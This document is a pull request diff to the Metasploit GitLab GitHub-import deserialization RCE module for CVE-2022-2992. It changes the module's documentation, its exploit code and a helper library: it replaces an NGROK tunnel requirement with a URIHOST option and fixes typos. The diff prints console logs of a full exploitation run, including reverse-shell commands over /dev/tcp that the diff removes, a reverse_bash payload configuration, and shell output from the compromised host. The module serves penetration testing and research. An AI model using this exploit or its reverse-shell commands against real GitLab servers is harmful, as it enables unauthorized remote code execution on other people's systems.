### PR TITLE
Pr/collab/17281

### DIFF
--- a/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
+++ b/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
@@ -2,17 +2,17 @@
 
 ### Description
 
-An authenticated user can import a repository from Github into Gitlab.
+An authenticated user can import a repository from GitHub into GitLab.
 
-When importing a GitHub repository the Gitlab api client uses `Sawyer` for handling the responses. This takes a JSON hash and converts
+When importing a GitHub repository the GitLab api client uses `Sawyer` for handling the responses. This takes a JSON hash and converts
 it into a Ruby class that has methods matching all of the keys. This happens recursively, and allows for any method to be overridden
 including built-in methods such as `to_s`.
 
 The redis gem uses `to_s` and `bytesize` to generate the RESP (Redis serialization protocol) command. By replying with a specially
-crafted JSON object (that will be further parsed as a `Sawyer::Resource`), one controlling the Github server can inject arbitrary
+crafted JSON object (that will be further parsed as a `Sawyer::Resource`), one controlling the GitHub server can inject arbitrary
 redis commands to the stream.
 
-On August 30, 2022, Gitlab released a software update that addressed this vulnerability (CVE-2022-2992).
+On August 30, 2022, GitLab released a software update that addressed this vulnerability (CVE-2022-2992).
 
 The following products are affected:
 
@@ -23,15 +23,15 @@ The following products are affected:
 
 ### Exploitation
 
-This module exploits the Gitlab vulnerability by injecting a Ruby serialized object into the Redis user
-session object. Once Gitlab calls the Marshal.load when loading the ` _gitlab_session` cookie, it will
+This module exploits the GitLab vulnerability by injecting a Ruby serialized object into the Redis user
+session object. Once GitLab calls the Marshal.load when loading the ` _gitlab_session` cookie, it will
 execute a deserialisation gadget and trigger the payload.
 
 To achieve that this module:
 - Will generate an universal Ruby deserialisation gadget payload;
 - Will create an access token for the user targeted;
-- Will start a server to emulate the Github and serve the payload to be injected;
-- Will create a group and also trigger the Github import feature to the repository from the controlled server
+- Will start a server to emulate GitHub and serve the payload to be injected;
+- Will create a group and also trigger the GitHub import feature to the repository from the controlled server
 - Will perform a request using the just injected session ID that when loaded must trigger the payload.
 
 After the execution the cleanup method will be called and:
@@ -81,7 +81,7 @@ $ TOKEN=`tr -dc A-Za-z0-9 </dev/urandom | head -c 24 ; echo ''`
 $ docker exec -e TOKEN=$TOKEN -it gitlab gitlab-rails runner "token = User.find_by_username('root').personal_access_tokens.create(scopes: [:sudo, :api], name: 'Automation token'); token.set_token(ENV['TOKEN']); token.save!"
 $ # Using the personal access token from the root user a user.
 $ USER=msf
-$ PASSWORD=SuperStrongestGitlabPassword
+$ PASSWORD=SuperStrongestGitLabPassword
 $ curl --request POST --header "PRIVATE-TOKEN: $TOKEN" --data "skip_confirmation=true&email=$USER@gitlab.example&name=$USER&username=$USER&password=$PASSWORD" "http://gitlab.example:880/api/v4/users"
 ```
 
@@ -92,7 +92,7 @@ Follow [Setup](#setup) and [Scenarios](#scenarios).
 
 ### TARGETURI (required)
 
-The path to the Gitlab (Default: `/`).
+The path to the GitLab (Default: `/`).
 
 ### USERNAME (required)
 
@@ -104,7 +104,7 @@ The password of the target user to authenticate with.
 
 ### NGROK_URL (required)
 
-The Ngrok tunnel url to be used. The Gitlab will perform requests to this address when trying to import the repository.
+The Ngrok tunnel url to be used. The GitLab will perform requests to this address when trying to import the repository.
 
 Example how start the tunnel:
 ```
@@ -121,7 +121,7 @@ The local port to listen on. This is the port to be used when creating the tunne
 
 ## Scenarios
 
-### Docker container running Gitlab 15.3.1
+### Docker container running GitLab 15.3.1
 
 ```
 msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > options

--- a/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
+++ b/documentation/modules/exploit/multi/http/gitlab_github_import_rce_cve_2022_2992.md
@@ -25,10 +25,10 @@ The following products are affected:
 
 This module exploits the GitLab vulnerability by injecting a Ruby serialized object into the Redis user
 session object. Once GitLab calls the Marshal.load when loading the ` _gitlab_session` cookie, it will
-execute a deserialisation gadget and trigger the payload.
+execute a deserialization gadget and trigger the payload.
 
 To achieve that this module:
-- Will generate an universal Ruby deserialisation gadget payload;
+- Will generate an universal Ruby deserialization gadget payload;
 - Will create an access token for the user targeted;
 - Will start a server to emulate GitHub and serve the payload to be injected;
 - Will create a group and also trigger the GitHub import feature to the repository from the controlled server
@@ -102,15 +102,6 @@ The username of the target user to authenticate with.
 
 The password of the target user to authenticate with.
 
-### NGROK_URL (required)
-
-The Ngrok tunnel url to be used. The GitLab will perform requests to this address when trying to import the repository.
-
-Example how start the tunnel:
-```
-ngrok http 127.0.0.1:4567
-```
-
 ### SRVHOST (required)
 
 The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
@@ -119,41 +110,66 @@ The local host or network interface to listen on. This must be an address on the
 
 The local port to listen on. This is the port to be used when creating the tunnel.
 
+### URIHOST
+
+Host to use in GitHub import URL. On default GitLab instances, this must be either a public (non-RFC1918) IP address or
+a hostname that resolves to a public IP address. This option can be used in conjunction with a reverse port-forwarding
+service such as SSH or NGROK. **The target GitLab server will connect to this host and eventually receive the payload
+through it, so it is important to use a host that is considered to be trustworthy.**
+
 ## Scenarios
 
 ### Docker container running GitLab 15.3.1
+
+The following example uses the following three hosts:
+
+* 192.168.159.128 -- The target GitLab server
+* 192.168.250.134 -- The host on which Metasploit is running
+* ext.msflab.local -- An external host on the internet through which the HTTP requests from GitLab to Metasploit are
+  tunneled in order to bypass GitLab restrictions.
+
+External to Metasploit, SSH is used to setup a reverse port forward through a host with a public (non-RFC1918) IP
+address. This is necessary to bypass Import URL restrictions that are in place by default on GitLab. The port-forward
+was configured with `ssh -R 8088:localhost:8088 ext.msflab.local` to forward TCP port 8088 on ext.msflab.local to the
+local Metasploit instance. Alternatively, this step could be skipped if Metasploit were running on a host with public IP
+address.
+
+If the target GitLab server can not import from the specified URL (for example because the host is a private IP
+address), then the module will throw this error:
+
+```
+[-] Exploit failed: Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError Invalid URL: http://192.168.250.134:8088/
+```
 
 ```
 msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > options
 
 Module options (exploit/multi/http/gitlab_github_import_rce_cve_2022_2992):
 
-   Name       Current Setting                         Required  Description
-   ----       ---------------                         --------  -----------
-   NGROK_URL  https://f8f5-194-230-160-77.eu.ngrok.i  yes       The Ngrok tunnel url
-              o
-   PASSWORD   12345678                                yes       The password for the specified username
-   Proxies    http:172.25.144.1:8080                  no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS     172.25.144.1                            yes       The target host(s), see https://github.com/rapid7/metasploit-framewor
-                                                                k/wiki/Using-Metasploit
-   RPORT      880                                     yes       The target port (TCP)
-   SRVHOST    0.0.0.0                                 yes       The local host or network interface to listen on. This must be an add
-                                                                ress on the local machine or 0.0.0.0 to listen on all addresses.
-   SRVPORT    4567                                    yes       The local port to listen on.
-   SSL        false                                   no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                                            no        Path to a custom SSL certificate (default is randomly generated)
-   TARGETURI  /                                       yes       The base path to the gitlab application
-   URIPATH                                            no        The URI to use for this exploit (default is random)
-   USERNAME   heyder                                  yes       The username to authenticate as
-   VHOST                                              no        HTTP server virtual host
+   Name          Current Setting          Required  Description
+   ----          ---------------          --------  -----------
+   IMPORT_DELAY  5                        yes       Time to wait from the import task before try to trigger the payload
+   PASSWORD      Password1!               yes       The password for the specified username
+   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        192.168.159.128          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         880                      yes       The target port (TCP)
+   SRVHOST       0.0.0.0                  yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT       8088                     yes       The local port to listen on.
+   SSL           false                    no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI     /                        yes       The base path to the gitlab application
+   URIHOST       ext.msflab.local         no        Host to use in GitHub import URL
+   URIPATH                                no        The URI to use for this exploit (default is random)
+   USERNAME      smcintyre                yes       The username to authenticate as
+   VHOST                                  no        HTTP server virtual host
 
 
 Payload options (cmd/unix/reverse_bash):
 
-   Name   Current Setting       Required  Description
-   ----   ---------------       --------  -----------
-   LHOST  host.docker.internal  yes       The listen address (an interface may be specified)
-   LPORT  4444                  yes       The listen port
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
 
 
 Exploit target:
@@ -162,30 +178,24 @@ Exploit target:
    --  ----
    0   Unix Command
 
-msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > exploit
 
-[+] bash -c '0<&212-;exec 212<>/dev/tcp/host.docker.internal/4444;sh <&212 >&212 2>&212'
-[*] Exploit running as background job 0.
-[*] Exploit completed, but no session was created.
-msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) >
-[-] Handler failed to bind to 169.254.192.184:4444:-  -
-[*] Started reverse TCP handler on 0.0.0.0:4444
-[!] AutoCheck is disabled, proceeding with exploitation
-[*] Using URL: http://host.docker.internal:4567/
-[*] Executing command: bash -c '0<&151-;exec 151<>/dev/tcp/host.docker.internal/4444;sh <&151 >&151 2>&151'
-[*] Session ID: lbid
-[*] Creating group KQPhsIKX
-[*] Importing a repository from github
-[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:58700) at 2022-11-19 15:23:06 +0100
 
-msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > sessions -1
-[*] Starting interaction with 1...
+View the full module info with the info, or info -d command.
 
+msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) > run
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected GitLab version 15.3.1 which is vulnerable.
+[*] Using URL: http://ext.msflab.local:8088/
+[*] Command shell session 1 opened (192.168.250.134:4444 -> 192.168.250.134:56794) at 2023-02-13 13:41:05 -0500
 id
+[*] Server stopped.
+
 uid=998(git) gid=998(git) groups=998(git)
 pwd
 /var/opt/gitlab/gitlab-rails/working
 exit
-[*] Server stopped.
-[*] 172.25.144.1 - Command shell session 1 closed.
+[*] 192.168.159.128 - Command shell session 1 closed.
+msf6 exploit(multi/http/gitlab_github_import_rce_cve_2022_2992) >
 ```

--- a/lib/msf/core/exploit/remote/http/gitlab.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab.rb
@@ -23,12 +23,6 @@ module Msf
                 Msf::OptString.new('TARGETURI', [true, 'The base path to the gitlab application', '/'])
               ], Msf::Exploit::Remote::HTTP::Gitlab
             )
-
-            register_advanced_options(
-              [
-                Msf::OptBool.new('GITLABCHECK', [true, 'Check if the website is a valid Gitlab install', true]),
-              ], Msf::Exploit::Remote::HTTP::Gitlab
-            )
           end
 
           # class GitLabClientException < StandardError; end

--- a/lib/msf/core/exploit/remote/http/gitlab/import.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/import.rb
@@ -25,14 +25,14 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Import
     raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
 
     # 422 is returned if the import failed, but the response body contains the error message
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, JSON.parse(res.body)['errors'] if res.code == 422
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, res.get_json_document['errors'] if res.code == 422
     # 201 is returned if the import was successfully enqueued
     raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, 'Import failed' unless res.code == 201
 
-    # Example of a successful reposnse body
+    # Example of a successful response body
     # {"id":54,"name":"gh-import-761","full_path":"/fpXxUqzfQY/gh-import-761","full_name":"fpXxUqzfQY / gh-import-761"}
 
-    body = JSON.parse(res.body)
+    body = res.get_json_document
 
     return body if body
 

--- a/lib/msf/core/exploit/remote/http/gitlab/import.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/import.rb
@@ -25,9 +25,14 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Import
     raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
 
     # 422 is returned if the import failed, but the response body contains the error message
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, res.get_json_document['errors'] if res.code == 422
+    if res.code == 422
+      raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, ((res.get_json_document || {})['errors'] || 'Import failed')
+    end
+
     # 201 is returned if the import was successfully enqueued
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, 'Import failed' unless res.code == 201
+    unless res.code == 201
+      raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, ((res.get_json_document || {})['errors'] || 'Import failed')
+    end
 
     # Example of a successful response body
     # {"id":54,"name":"gh-import-761","full_path":"/fpXxUqzfQY/gh-import-761","full_name":"fpXxUqzfQY / gh-import-761"}

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -20,12 +20,12 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Gitlab Github Repo Import Deserialization RCE',
+        'Name' => 'GitLab GitHub Repo Import Deserialization RCE',
         'Description' => %q{
-          An authenticated user can import a repository from Github into Gitlab.
+          An authenticated user can import a repository from GitHub into GitLab.
           If a user attempts to import a repo from an attacker-controlled server,
           the server will reply with a Redis serialization protocol object in the nested
-          `default_branch`. Gitlab will cache this object and
+          `default_branch`. GitLab will cache this object and
           then deserialize it when trying to load a user session, resulting in RCE.
         },
         'Author' => [
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     version = Rex::Version.new(gitlab_version)
 
-    return CheckCode::Safe("Detected Gitlab version #{version} which is not vulnerable") unless (
+    return CheckCode::Safe("Detected GitLab version #{version} which is not vulnerable") unless (
       version.between?(Rex::Version.new('11.10'), Rex::Version.new('15.1.6')) ||
       version.between?(Rex::Version.new('15.2'), Rex::Version.new('15.2.4')) ||
       version.between?(Rex::Version.new('15.3'), Rex::Version.new('15.3.2'))
@@ -118,7 +118,9 @@ class MetasploitModule < Msf::Exploit::Remote
       refs: references,
       info: [version]
     )
-    return CheckCode::Vulnerable("Detected Gitlab version #{version} which is vulnerable")
+    return CheckCode::Appears("Detected GitLab version #{version} which is vulnerable.")
+  rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError
+    return CheckCode::Detected('Could not detect the version because authentication failed.')
   rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e
     return CheckCode::Unknown("#{e.class} - #{e.message}")
   end
@@ -151,11 +153,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     vprint_status("Executing command: #{cmd}")
-    # due the AutoCheck mixin and the keep_cookies option the cookie might be already seted
+    # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set
     self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
     vprint_status("Session ID: #{session_id}")
     vprint_status("Creating group #{group_name}")
-    # We need group id for the clenaup method
+    # We need group id for the cleanup method
     @group_id = gitlab_create_group(group_name, api_token)['id']
     fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id
     @redis_payload = redis_payload(cmd)
@@ -206,7 +208,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @packfile = Msf::Exploit::Git::Packfile.new('2', git_objs)
   end
 
-  # Handle incoming requests from Gitlab server
+  # Handle incoming requests from GitLab server
   def on_request_uri(cli, req)
     super
     headers = { 'Content-Type' => 'application/json' }

--- a/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
+++ b/modules/exploits/multi/http/gitlab_github_import_rce_cve_2022_2992.rb
@@ -44,6 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD],
         'Privileged' => false,
+        'Stance' => Msf::Exploit::Stance::Aggressive,
         'Targets' => [
           [
             'Unix Command',
@@ -70,8 +71,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
         OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),
-        OptString.new('NGROK_URL', [true, 'The Ngrok tunnel url', '/']),
         OptInt.new('IMPORT_DELAY', [true, 'Time to wait from the import task before try to trigger the payload', 5]),
+        OptAddress.new('URIHOST', [false, 'Host to use in GitHub import URL'])
       ]
     )
     deregister_options('GIT_URI')
@@ -102,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie
 
-    vprint_status('Trying to get the gitlab version')
+    vprint_status('Trying to get the GitLab version')
 
     version = Rex::Version.new(gitlab_version)
 
@@ -137,6 +138,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    if Rex::Socket.is_internal?(srvhost_addr)
+      print_warning("#{srvhost_addr} is an internal address and will not work unless the target GitLab instance is using a non-default configuration.")
+    end
+
     setup_repo_structure
     start_service({
       'Uri' => {
@@ -161,15 +166,15 @@ class MetasploitModule < Msf::Exploit::Remote
     @group_id = gitlab_create_group(group_name, api_token)['id']
     fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id
     @redis_payload = redis_payload(cmd)
-    # import a repository from github
-    vprint_status('Importing a repository from github')
+    # import a repository from GitHub
+    vprint_status('Importing a repository from GitHub')
     @import_id = gitlab_import_github_repo(
       group_name: group_name,
-      github_hostname: datastore['NGROK_URL'],
+      github_hostname: get_uri,
       api_token: api_token
     )['id']
     # binding.pry
-    fail_with(Failure::UnexpectedReply, 'Failed to import a repository from github') unless @import_id
+    fail_with(Failure::UnexpectedReply, 'Failed to import a repository from GitHub') unless @import_id
     # wait for the import tasks to finish
     select(nil, nil, nil, datastore['IMPORT_DELAY'])
     # execute the payload
@@ -226,7 +231,7 @@ class MetasploitModule < Msf::Exploit::Remote
         id: id,
         name: name,
         full_name: "#{name}/name",
-        clone_url: "#{datastore['NGROK_URL']}/#{name}/public.git"
+        clone_url: "#{get_uri.gsub(%r{/+$}, '')}/#{name}/public.git"
       }.to_json
     when %r{/\w+/public.git/info/refs}
       data = build_pkt_line_advertise(@refs)


### PR DESCRIPTION
This makes the necessary changes to remove NGROK as a dependency for this exploit module. It's an option that users can use, but it shouldn't be a requirement due to the server not being trusted and the payload being proxied through it. This uses the URIHOST option, which allows users to set where the GitLab server should connect to in order to access the server.

Also fixed a bunch of typos, including switching github to GitHub and gitlab to GitLab so it's consistent with the brand's preferred convention.

Added a check if the server host is a private IP address and warns when that's the case.

Also updated the check method to report detected when there's an authentication error.

Also updated the ImportError to propagate error information.